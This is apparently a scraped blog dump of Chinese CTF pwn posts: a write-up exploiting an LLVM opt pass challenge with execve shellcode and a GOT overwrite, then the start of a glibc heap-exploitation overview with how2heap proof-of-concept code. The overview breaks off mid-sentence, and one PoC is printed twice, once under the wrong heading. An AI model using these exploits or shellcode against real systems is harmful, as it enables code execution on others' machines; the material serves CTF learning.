-o a.bc.bc -&gt; .ll: llvm-dis a.bc -o a.ll.bc -&gt; .s: llc a.bc -o a.s 由于笔者实机为Fedora, 所以笔者使用ubuntu docker 来安装llvm和clang，在需要调试时，将相应共享库导入到本地，用patchelf来更改软链接，还是在docker中配置调试环境比较方便.jpg 启动一个ubuntu:20.04的container，如下安装并配置好调试环境即可 12345678sudo apt install clang-8sudo apt install llvm-8 sudo apt install clang-10sudo apt install llvm-10 sudo apt install clang-12sudo apt install llvm-12 opt就是所要pwn掉的对象，他是llvm的优化器，可以加载指定pass模块和exp对应ll代码，由于opt一般无PIE保护，所以一般通过覆盖got表来实现劫持控制流。自己安装的opt路径为/usr/lib/llvm-xx/bin/opt so分析 如何定位重写的 runOnFunction 函数呢? 首先定位到.data.rel.ro 段的vtable，其最后一项就是此函数。 另一种定位方法： 首先找到注册的Pass的字符串。 这里IDA没有自动识别，将Hello字符串更改类型并命名 然后通过交叉引用找到Pass注册函数 跟进sub_7e10 跟进sub_7F90 继续跟进 此处unk_FD48即为虚表地址。 函数对照 getName()：获取当前处理的函数名 getOpcodeName()：获取操作符名称 getOpcodeName()函数用于获取指令的操作符的名称 getNumOperands()用于获取指令的操作数的个数 getOpcode()函数用于获取指令的操作符编号，在/usr/include/llvm-xx/llvm/IR/Instruction.def可以找到编号和操作符的对应表 getOperand(i)是用于获取第i个操作数（在这里就是获取所调用函数的第i个参数），getArgOperand()函数与其用法类似，但只能获取参数，getZExtValue()即get Zero Extended Value，也就是将获取的操作数转为无符号扩展整数。 调试 调试实际上是调试opt，所以采用如下方法调试即可: 1gdb ./opt 先用gdb调试opt 12set args -load ./&lt;pass so name&gt;.so -&lt;pass name&gt; exp.llstart 再设置参数加载pass 1n &lt;一系列call指令数&gt; 在开始的200左右个call指令后，pass.so才会加载进内存 1b *&lt;pass加载地址&gt;+&lt;偏移&gt; 注意事项 heap 由于opt是一个较为复杂的软件，运行过程中，存在相当多的无关chunk的分配，而且，由于exp.ll会被加载进入内存，即使exp变动的很小，chunk布局也可能会发生改变，因此需要小心注意chunk之间的偏移，可以考虑预先多分配一些chunk填充，方便之后更改偏移。 got 如何选择覆写的got表？ 首先通过调用链确定runOnFunction 的调用位置。 然后通过finish 返回到main后，查找后面使用到的got表即可 example 2023-ciscn-huazhong-lvm 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266__int64 __fastcall sub_8050(__int64 a1, llvm::Function *a2)&#123; __int64 v2; // rdx llvm::BasicBlock *v3; // rax llvm::BasicBlock *v4; // rax llvm::Instruction *v5; // rax llvm::Value *CalledFunction; // rax __int64 v7; // rdx __int64 ArgOperand; // rax llvm::ConstantInt *v9; // rax __int64 v10; // rax __int64 v11; // rax llvm::User *v12; // rax __int64 v13; // rax llvm::ConstantInt *v14; // rax llvm::User *v15; // rax __int64 v16; // rax llvm::ConstantInt *v17; // rax __int64 v18; // rax llvm::ConstantInt *v19; // rax __int64 v20; // rax llvm::ConstantInt *v21; // rax llvm::User *v22; // rax __int64 v23; // rax llvm::ConstantInt *v24; // rax __int64 v25; // rax llvm::ConstantInt *v26; // rax char v28; // [rsp+Eh] [rbp-182h] char v29; // [rsp+Fh] [rbp-181h] int v30; // [rsp+10h] [rbp-180h] int v31; // [rsp+14h] [rbp-17Ch] __int64 v32; // [rsp+18h] [rbp-178h] BYREF __int64 v33; // [rsp+20h] [rbp-170h] BYREF __int64 v34[2]; // [rsp+28h] [rbp-168h] BYREF __int64 v35; // [rsp+38h] [rbp-158h] __int64 v36; // [rsp+40h] [rbp-150h] __int64 v37[2]; // [rsp+48h] [rbp-148h] BYREF __int64 v38; // [rsp+58h] [rbp-138h] __int64 v39; // [rsp+60h] [rbp-130h] int v40; // [rsp+6Ch] [rbp-124h] int v41; // [rsp+70h] [rbp-120h] int v42; // [rsp+74h] [rbp-11Ch] __int64 v43; // [rsp+78h] [rbp-118h] BYREF __int64 v44; // [rsp+80h] [rbp-110h] BYREF __int64 v45; // [rsp+88h] [rbp-108h] BYREF __int64 v46[2]; // [rsp+90h] [rbp-100h] BYREF __int64 v47; // [rsp+A0h] [rbp-F0h] __int64 v48; // [rsp+A8h] [rbp-E8h] int v49; // [rsp+B4h] [rbp-DCh] __int64 v50; // [rsp+B8h] [rbp-D8h] BYREF _QWORD v51[2]; // [rsp+C0h] [rbp-D0h] BYREF __int64 v52; // [rsp+D0h] [rbp-C0h] __int64 v53; // [rsp+D8h] [rbp-B8h] int i; // [rsp+E4h] [rbp-ACh] void *v55; // [rsp+E8h] [rbp-A8h] int ZExtValue; // [rsp+F4h] [rbp-9Ch] __int64 Operand; // [rsp+F8h] [rbp-98h] BYREF _QWORD v58[2]; // [rsp+100h] [rbp-90h] BYREF __int64 v59; // [rsp+110h] [rbp-80h] __int64 v60; // [rsp+118h] [rbp-78h] __int64 Name; // [rsp+120h] [rbp-70h] __int64 v62; // [rsp+128h] [rbp-68h] llvm::CallBase *v63; // [rsp+130h] [rbp-60h] __int64 v64; // [rsp+138h] [rbp-58h] BYREF __int64 v65; // [rsp+140h] [rbp-50h] BYREF __int64 v66; // [rsp+148h] [rbp-48h] BYREF __int64 v67; // [rsp+150h] [rbp-40h] BYREF __int64 v68; // [rsp+158h] [rbp-38h] BYREF _QWORD v69[3]; // [rsp+160h] [rbp-30h] BYREF llvm::Function *v70; // [rsp+178h] [rbp-18h] __int64 v71; // [rsp+180h] [rbp-10h] char v72; // [rsp+18Fh] [rbp-1h] v71 = a1; v70 = a2; v69[1] = llvm::Value::getName(a2); v69[2] = v2; v68 = llvm::Function::end(a2); llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::BasicBlock,false,false,void&gt;,false,true&gt;::ilist_iterator&lt;false&gt;( v69, &amp;v68, 0LL); v66 = llvm::Function::begin(v70); llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::BasicBlock,false,false,void&gt;,false,true&gt;::ilist_iterator&lt;false&gt;( &amp;v67, &amp;v66, 0LL); while ( (llvm::operator!=(&amp;v67, v69) &amp; 1) != 0 ) &#123; v3 = (llvm::BasicBlock *)llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::BasicBlock,false,false,void&gt;,false,true&gt;::operator-&gt;(&amp;v67); v65 = llvm::BasicBlock::begin(v3); v4 = (llvm::BasicBlock *)llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::BasicBlock,false,false,void&gt;,false,true&gt;::operator-&gt;(&amp;v67); v64 = llvm::BasicBlock::end(v4); while ( (llvm::operator!=(&amp;v65, &amp;v64) &amp; 1) != 0 ) &#123; v5 = (llvm::Instruction *)llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::Instruction,false,false,void&gt;,false,true&gt;::operator-&gt;(&amp;v65); if ( (unsigned int)llvm::Instruction::getOpcode(v5) == 56 ) &#123; v63 = (llvm::CallBase *)llvm::dyn_cast&lt;llvm::CallInst,llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::Instruction,false,false,void&gt;,false,true&gt;&gt;(&amp;v65); CalledFunction = (llvm::Value *)llvm::CallBase::getCalledFunction(v63); Name = llvm::Value::getName(CalledFunction); v62 = v7; v59 = Name; v60 = v7; llvm::StringRef::StringRef((std::_Function_base *)v58, &quot;Add&quot;); if ( (llvm::operator==(v59, v60, v58[0], v58[1]) &amp; 1) != 0 ) &#123; Operand = llvm::CallBase::getOperand(v63, 0); if ( (llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;Operand) &amp; 1) == 0 ) &#123; v10 = llvm::errs((llvm *)&amp;Operand); v11 = llvm::raw_ostream::operator&lt;&lt;(v10, &quot;Error argument&quot;); llvm::raw_ostream::operator&lt;&lt;(v11, &quot;\\n&quot;); v72 = 0; return v72 &amp; 1; &#125; ArgOperand = llvm::CallBase::getArgOperand(v63, 0); v9 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(ArgOperand); ZExtValue = llvm::ConstantInt::getZExtValue(v9); v55 = 0LL; v55 = malloc(ZExtValue); if ( !v55 ) &#123; perror(&quot;malloc&quot;); v72 = 0; return v72 &amp; 1; &#125; for ( i = 0; i &lt; 32; ++i ) &#123; if ( !*((_QWORD *)&amp;addrList + i) ) &#123; *((_QWORD *)&amp;addrList + i) = v55; break; &#125; &#125; &#125; else &#123; v52 = Name; v53 = v62; llvm::StringRef::StringRef((std::_Function_base *)v51, &quot;Del&quot;); if ( (llvm::operator==(v52, v53, v51[0], v51[1]) &amp; 1) != 0 ) &#123; v12 = (llvm::User *)llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::Instruction,false,false,void&gt;,false,true&gt;::operator-&gt;(&amp;v65); if ( (unsigned int)llvm::User::getNumOperands(v12) != 2 ) &#123; printf(&quot;ERROR argument size&quot;); v72 = 0; return v72 &amp; 1; &#125; v50 = llvm::CallBase::getOperand(v63, 0); if ( (llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;v50) &amp; 1) != 0 ) &#123; v13 = llvm::CallBase::getArgOperand(v63, 0); v14 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(v13); v49 = llvm::ConstantInt::getZExtValue(v14); if ( !*((_QWORD *)&amp;addrList + v49) || v49 &gt;= 32 ) &#123; v72 = 0; return v72 &amp; 1; &#125; free(*((void **)&amp;addrList + v49)); *((_QWORD *)&amp;addrList + v49) = 0LL; &#125; &#125; else &#123; v47 = Name; v48 = v62; llvm::StringRef::StringRef((std::_Function_base *)v46, &quot;Edit&quot;); if ( (llvm::operator==(v47, v48, v46[0], v46[1]) &amp; 1) != 0 ) &#123; v15 = (llvm::User *)llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::Instruction,false,false,void&gt;,false,true&gt;::operator-&gt;(&amp;v65); if ( (unsigned int)llvm::User::getNumOperands(v15) != 4 ) goto LABEL_28; v45 = llvm::CallBase::getOperand(v63, 0); v29 = 0; if ( (llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;v45) &amp; 1) != 0 ) &#123; v44 = llvm::CallBase::getOperand(v63, 1u); v29 = 0; if ( (llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;v44) &amp; 1) != 0 ) &#123; v43 = llvm::CallBase::getOperand(v63, 2u); v29 = llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;v43); &#125; &#125; if ( (v29 &amp; 1) != 0 ) &#123; v16 = llvm::CallBase::getArgOperand(v63, 0); v17 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(v16); v42 = llvm::ConstantInt::getZExtValue(v17); v18 = llvm::CallBase::getArgOperand(v63, 1u); v19 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(v18); v41 = llvm::ConstantInt::getZExtValue(v19); v20 = llvm::CallBase::getArgOperand(v63, 2u); v21 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(v20); v40 = llvm::ConstantInt::getZExtValue(v21); if ( !*((_QWORD *)&amp;addrList + v42) || v42 &gt;= 32 ) &#123; v72 = 0; return v72 &amp; 1; &#125; *(_DWORD *)(*((_QWORD *)&amp;addrList + v42) + 4LL * v41) = v40; &#125; &#125; else &#123; v38 = Name; v39 = v62; llvm::StringRef::StringRef((std::_Function_base *)v37, &quot;Alloc&quot;); if ( (llvm::operator==(v38, v39, v37[0], v37[1]) &amp; 1) != 0 ) &#123; mmap(&amp;off_10000, 0x1000uLL, 7, 33, 0, 0LL); &#125; else &#123; v35 = Name; v36 = v62; llvm::StringRef::StringRef((std::_Function_base *)v34, &quot;EditAlloc&quot;); if ( (llvm::operator==(v35, v36, v34[0], v34[1]) &amp; 1) != 0 ) &#123; v22 = (llvm::User *)llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::Instruction,false,false,void&gt;,false,true&gt;::operator-&gt;(&amp;v65); if ( (unsigned int)llvm::User::getNumOperands(v22) != 3 ) &#123;LABEL_28: printf(&quot;Error argument size&quot;); v72 = 0; return v72 &amp; 1; &#125; v33 = llvm::CallBase::getOperand(v63, 0); v28 = 0; if ( (llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;v33) &amp; 1) != 0 ) &#123; v32 = llvm::CallBase::getOperand(v63, 1u); v28 = llvm::isa&lt;llvm::ConstantInt,llvm::Value *&gt;(&amp;v32); &#125; if ( (v28 &amp; 1) != 0 ) &#123; v23 = llvm::CallBase::getArgOperand(v63, 0); v24 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(v23); v31 = llvm::ConstantInt::getZExtValue(v24); v25 = llvm::CallBase::getArgOperand(v63, 1u); v26 = (llvm::ConstantInt *)llvm::dyn_cast&lt;llvm::ConstantInt,llvm::Value&gt;(v25); v30 = llvm::ConstantInt::getZExtValue(v26); if ( !*((_QWORD *)&amp;addrList + v31) || v31 &gt;= 32 || v30 &gt;= 256 ) &#123; v72 = 0; return v72 &amp; 1; &#125; *(_DWORD *)(v30 + 0x10000) = **((_DWORD **)&amp;addrList + v31); &#125; &#125; &#125; &#125; &#125; &#125; &#125; llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::Instruction,false,false,void&gt;,false,true&gt;::operator++(&amp;v65); &#125; llvm::ilist_iterator&lt;llvm::ilist_detail::node_options&lt;llvm::BasicBlock,false,false,void&gt;,false,true&gt;::operator++(&amp;v67); &#125; v72 = 0; return v72 &amp; 1;&#125; 实现了一个类似菜单堆的面板，通过Alloc可以分配一块位于0x10000的可执行区域，在此写入shellcode，Edit存在溢出，可以使用负偏移从而改写tcache管理结构体，这里考虑将0x40的链表改写成oprator delete(void*) 的got表的位置，并且将其剩余数量改写为1，以防止继续分配coredump，之后覆写got表为0x10000。 exp: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354#include &lt;stdio.h&gt;void Add(int size);// Add any sizevoid Del(int idx);// Delvoid Edit(int idx, int offset, unsigned int num);// Allocvoid Alloc(void);void EditAlloc(int num, int offset);// write got/*&quot;\\x48\\x31\\xf6\\x560x56f63148\\x48\\xbf\\x2f\\x620x622fbf48\\x69\\x6e\\x2f\\x2f0x2f2f6e69\\x73\\x68\\x57\\x54&quot;0x54576873&quot;\\x5f\\xb0\\x3b\\x990x993bb05f\\x0f\\x05&quot;*/int main()&#123; Add(0); // 0 Edit(0, 0, 0x56f63148); Add(0); // 1 Edit(1, 0, 0x622fbf48); Add(0); // 2 Edit(2, 0, 0x2f2f6e69); Add(0); // 3 Edit(3, 0, 0x54576873); Add(0); // 4 Edit(4, 0, 0x993bb05f); Add(0); // 5 Edit(5, 0, 0x050f); Alloc(); EditAlloc(0, 0); EditAlloc(1, 4); EditAlloc(2, 4 * 2); EditAlloc(3, 4 * 3); EditAlloc(4, 4 * 4); EditAlloc(5, 4 * 5); // set tcache 0x40 num and link Edit(0, -0x25d6f, 1); Edit(0, -0x25d4c, (0x78B000)); // make opretor delete got to 0x10000 Add(0x30); // 6 Edit(6, 1, 0); Edit(6, 0, 0x10000); // Add(0);&#125;","categories":[{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/categories/CTF/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"}]},{"title":"Pwn.Heap-Exploation-up-to-2.31","slug":"Pwn.Heap-Exploation-up-to-2.31","date":"2023-06-20T16:00:00.000Z","updated":"2024-03-04T07:37:44.361Z","comments":true,"path":"Pwn.Heap-Exploation-up-to-2.31/","link":"","permalink":"https://v3rdant.cn/Pwn.Heap-Exploation-up-to-2.31/","excerpt":"关于heap我所知道的一切","text":"关于heap我所知道的一切 Basic Knowledge bins: unsorted bin fast bin small bin large bin NO LIMITATION 0x20-0x80 &lt;0x400 &gt;0x400 libc version ubuntu-libc version 2.23=“16.04” 2.24=“17.04” 2.26=“17.10” 2.27=“18.04” 2.28=“18.10” 2.29=“19.04” 2.30=“19.10” 2.31=“20.04” 2.32=“20.10” 2.33=“21.04” 2.34=“22.04” Overview 在刚刚入门堆时，笔者是比较苦恼的，笔者在学习一项知识时，习惯性地想先从大局着手来学习。即，先对这个知识内容的整体有一定了解后，再去填充细节内容。然而在笔者开始学习堆利用时，被各种繁杂的版本差异和堆利用弄得头昏脑涨，因此对于堆一直不得其门而入，无法深刻理解多种多样的技巧及其使用时机，也因此不像栈溢出一样，笔者无法快速理出一个直观的脉络，然后安排细化的学习路径。 本文主要针对glibc2.30及以上有着tcache的版本。因为低于2.27版本的堆笔者根本不会 正如关于栈溢出的文章中，笔者根据攻击点将栈溢出分为三种，在这篇文章中，笔者也将拆解heap exploation，完成笔者心目中的一个划分。 在笔者看来，一次堆利用主要分为一下几个步骤： 漏洞的发现 地址的泄露 利用漏洞控制目标地址内容 攻击的对象 因此，本文的主要的编排顺序，也是按照这样几个顺序来实现的。笔者首先将会介绍堆利用过程中的一些基本漏洞，其次，笔者将会介绍如何完成地址泄露，接着，笔者将会讨论一些heap exploation的技术以及这些技术如何控制目标地址，而在可以控制一个目标地址后，最后笔者将讨论如何如何我们可以选取哪些攻击对象，以及他们各自有什么优劣。 笔者写这一篇文章时，去年这个时间差不多是我刚刚开始学习堆利用的时间，经过一年的时间，笔者总算感觉对于堆利用有了一个比较综合性的认知，尽管当前关于heap exploation的blog很多，但是笔者仍然感觉过于零散，因此，在这篇文章中，同笔者关于栈溢出的文章一样，笔者也不会过多的讲述各个技巧的细节–去看这些技巧的提出者大师傅可能讲述地要比我更完善–而着重于贯穿各个技巧的联系， 才不是因为笔者懒呢 ，目的是提供一个学习路径的图谱和完成一次堆利用时的思考路径。 基本漏洞 UAF 在free时没有清空指针，可以重利用指针。 在没有Edit 的情况下，可以通过 double free 进行堆块重叠。 overflow 溢出，可以控制下一个chunk，一般而言，可以方便地转换为堆块重叠，因此，也容易利用 off-by-one/off-by-null 这里主要针对2.29-2.31版本, 2.29-2.31版本的off-by-null ，wjh师傅已经讲解的非常详细了，核心就是通过unsorted bin机制残留的指针伪造fd、bk，来进行unlink，最后制造堆重叠。 漏洞的利用 上述几个漏洞都可以方便地转换为堆重叠，在此基础上，可以很方便地转换为任意地址写，在small bin的范围内，可以考虑tcache poison，在large bin的范围内，可以考虑large bin attack，在此基础上再对特定的攻击面进行攻击，即可劫持控制流 考虑: one gadget system(“/bin/sh”) orw leak 一般而言，堆题中的leak主要是针对libc地址，heap地址的leak相对而言较为简单，而libc地址的leak将在 [[#stack]] 攻击面部分详述。 一般而言，heap leak 堆地址主要利用unsorted bin的第一个chunk会存在libc地址来leak。如果存在UAF，可以将一个直接放入unsorted bin，然后show来获得。 也可以释放入unsorted bin 后再申请回来实现，由于malloc并不会清空chunk内容，因此可以读取到残留的libc的指针。 此外，当释放进入unsorted bin后，申请一个从unsorted bin 切分下的 chunk，此时chunk头也会留有相应指针。 而在没有show相关输出chunk内容的函数时，考虑通过_IO_2_1_stdout_ 来leak 基本原理就是partial overwrite 覆盖unsorted bin中的libc地址，分配到__IO_2_1_stdout的位置，然后改写来完成leak Basic tricks up to 2.30 在2.30以上的版本，我认为需要掌握的基本技术主要包括: [x] largebin attack [x] tcache stashing unlink attack [x] unsafe unlink [x] tcache poison [x] house of botcake [x] decrypt safe_unlink [x] house of pig [x] 堆布局 这里结合how to heap源代码分析 Largebin attack 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#include &lt;string.h&gt;#include &lt;stdint.h&gt;#include &lt;assert.h&gt;uint64_t *chunk0_ptr;int main()&#123; setbuf(stdout, NULL); printf(&quot;Welcome to unsafe unlink 2.0!\\n&quot;); printf(&quot;Tested in Ubuntu 20.04 64bit.\\n&quot;); printf(&quot;This technique can be used when you have a pointer at a known location to a region you can call unlink on.\\n&quot;); printf(&quot;The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\\n&quot;); int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin int header_size = 2; printf(&quot;The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\\n\\n&quot;); chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0 uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1 printf(&quot;The global chunk0_ptr is at %p, pointing to %p\\n&quot;, &amp;chunk0_ptr, chunk0_ptr); printf(&quot;The victim chunk we are going to corrupt is at %p\\n\\n&quot;, chunk1_ptr); printf(&quot;We create a fake chunk inside chunk0.\\n&quot;); printf(&quot;We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\\n&quot;); chunk0_ptr[1] = chunk0_ptr[-1] - 0x10; printf(&quot;We setup the &#x27;next_free_chunk&#x27; (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk = P.\\n&quot;); chunk0_ptr[2] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*3); printf(&quot;We setup the &#x27;previous_free_chunk&#x27; (bk) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;bk-&gt;fd = P.\\n&quot;); printf(&quot;With this setup we can pass this check: (P-&gt;fd-&gt;bk != P || P-&gt;bk-&gt;fd != P) == False\\n&quot;); chunk0_ptr[3] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*2); printf(&quot;Fake chunk fd: %p\\n&quot;,(void*) chunk0_ptr[2]); printf(&quot;Fake chunk bk: %p\\n\\n&quot;,(void*) chunk0_ptr[3]); printf(&quot;We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\\n&quot;); uint64_t *chunk1_hdr = chunk1_ptr - header_size; printf(&quot;We shrink the size of chunk0 (saved as &#x27;previous_size&#x27; in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\\n&quot;); printf(&quot;It&#x27;s important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\\n&quot;); chunk1_hdr[0] = malloc_size; printf(&quot;If we had &#x27;normally&#x27; freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\\n&quot;,(void*)chunk1_hdr[0]); printf(&quot;We mark our fake chunk as free by setting &#x27;previous_in_use&#x27; of chunk1 as False.\\n\\n&quot;); chunk1_hdr[1] &amp;= ~1; printf(&quot;Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\\n&quot;); printf(&quot;You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\\n\\n&quot;); free(chunk1_ptr); printf(&quot;At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\\n&quot;); char victim_string[8]; strcpy(victim_string,&quot;Hello!~&quot;); chunk0_ptr[3] = (uint64_t) victim_string; printf(&quot;chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\\n&quot;); printf(&quot;Original value: %s\\n&quot;,victim_string); chunk0_ptr[0] = 0x4141414142424242LL; printf(&quot;New Value: %s\\n&quot;,victim_string); // sanity check assert(*(long *)victim_string == 0x4141414142424242L);&#125; 核心思路: 12345678910111213141516malloc(0x420) # chunk Amalloc(0x18)#And another chunk to prevent consolidatemalloc(0x410) # chunk B#This chunk should be smaller than [p1] and belong to the same large binmalloc(0x18)#And another chunk to prevent consolidatefree(0)malloc(0x438)#Allocate a chunk larger than [p1] to insert [p1] into large binfree(1)#Free the smaller of the two --&gt; [p2]edit(0, p64(0)*3+p64(target2-0x20))#最终addr1与addr2地址中的值均被赋成了victim即chunk_B的chunk header地址最终addr1与addr2地址中的值均被赋成了victim即chunk_B的chunk header地址malloc(0x438)edit(0, p64(recover)*2) # 修复large bin attack 修复: 可以通过gdb查看未更改时chunk A的fd和bk，然后修复，免于计算 限制: 需要一次UAF 效果: 在2.30以上可以在任意地址写入一个libc地址 unsafe unlink 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#include &lt;string.h&gt;#include &lt;stdint.h&gt;#include &lt;assert.h&gt;uint64_t *chunk0_ptr;int main()&#123; setbuf(stdout, NULL); printf(&quot;Welcome to unsafe unlink 2.0!\\n&quot;); printf(&quot;Tested in Ubuntu 20.04 64bit.\\n&quot;); printf(&quot;This technique can be used when you have a pointer at a known location to a region you can call unlink on.\\n&quot;); printf(&quot;The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\\n&quot;); int malloc_size = 0x420; //we want to be big enough not to use tcache or fastbin int header_size = 2; printf(&quot;The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\\n\\n&quot;); chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0 uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1 printf(&quot;The global chunk0_ptr is at %p, pointing to %p\\n&quot;, &amp;chunk0_ptr, chunk0_ptr); printf(&quot;The victim chunk we are going to corrupt is at %p\\n\\n&quot;, chunk1_ptr); printf(&quot;We create a fake chunk inside chunk0.\\n&quot;); printf(&quot;We setup the size of our fake chunk so that we can bypass the check introduced in https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d6db68e66dff25d12c3bc5641b60cbd7fb6ab44f\\n&quot;); chunk0_ptr[1] = chunk0_ptr[-1] - 0x10; printf(&quot;We setup the &#x27;next_free_chunk&#x27; (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk = P.\\n&quot;); chunk0_ptr[2] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*3); printf(&quot;We setup the &#x27;previous_free_chunk&#x27; (bk) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;bk-&gt;fd = P.\\n&quot;); printf(&quot;With this setup we can pass this check: (P-&gt;fd-&gt;bk != P || P-&gt;bk-&gt;fd != P) == False\\n&quot;); chunk0_ptr[3] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*2); printf(&quot;Fake chunk fd: %p\\n&quot;,(void*) chunk0_ptr[2]); printf(&quot;Fake chunk bk: %p\\n\\n&quot;,(void*) chunk0_ptr[3]); printf(&quot;We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\\n&quot;); uint64_t *chunk1_hdr = chunk1_ptr - header_size; printf(&quot;We shrink the size of chunk0 (saved as &#x27;previous_size&#x27; in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\\n&quot;); printf(&quot;It&#x27;s important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\\n&quot;); chunk1_hdr[0] = malloc_size; printf(&quot;If we had &#x27;normally&#x27; freed chunk0, chunk1.previous_size would have been 0x430, however this is its new value: %p\\n&quot;,(void*)chunk1_hdr[0]); printf(&quot;We mark our fake chunk as free by setting &#x27;previous_in_use&#x27; of chunk1 as False.\\n\\n&quot;); chunk1_hdr[1] &amp;= ~1; printf(&quot;Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\\n&quot;); printf(&quot;You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\\n\\n&quot;); free(chunk1_ptr); printf(&quot;At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\\n&quot;); char victim_string[8]; strcpy(victim_string,&quot;Hello!~&quot;); chunk0_ptr[3] = (uint64_t) victim_string; printf(&quot;chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\\n&quot;); printf(&quot;Original value: %s\\n&quot;,victim_string); chunk0_ptr[0] = 0x4141414142424242LL; printf(&quot;New Value: %s\\n&quot;,victim_string); // sanity check assert(*(long *)victim_string == 0x4141414142424242L);&#125; 核心思路: 123456# chunk 0 ptr store in &amp;ptrmalloc(0x420) # not in fastbin or tcachemalloc(0x420) edit(0, p64(0)+p64(fake_size)+p64(&amp;ptr-0x18)+p64(&amp;ptr-0x10)+p64(0)*k + p64(fake_prev_size)+p64(size)) # fakesize = 0x420-0x10# need fake_prev_size = prev_size-0x10, sive.PREV_INUSE = 0 限制: overflow ,可以修改prev_inuse触发fake chunk unlink and consolidate 主要适用于可以知道堆指针存储基址的情况，可以控制堆管理机构 效果: 可以将ptr处地址改写为&amp;ptr-8 tcache stashing unlink 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;#include &lt;assert.h&gt;int main()&#123; unsigned long stack_var[0x10] = &#123;0&#125;; unsigned long *chunk_lis[0x10] = &#123;0&#125;; unsigned long *target; setbuf(stdout, NULL); printf(&quot;This file demonstrates the stashing unlink attack on tcache.\\n\\n&quot;); printf(&quot;This poc has been tested on both glibc-2.27, glibc-2.29 and glibc-2.31.\\n\\n&quot;); printf(&quot;This technique can be used when you are able to overwrite the 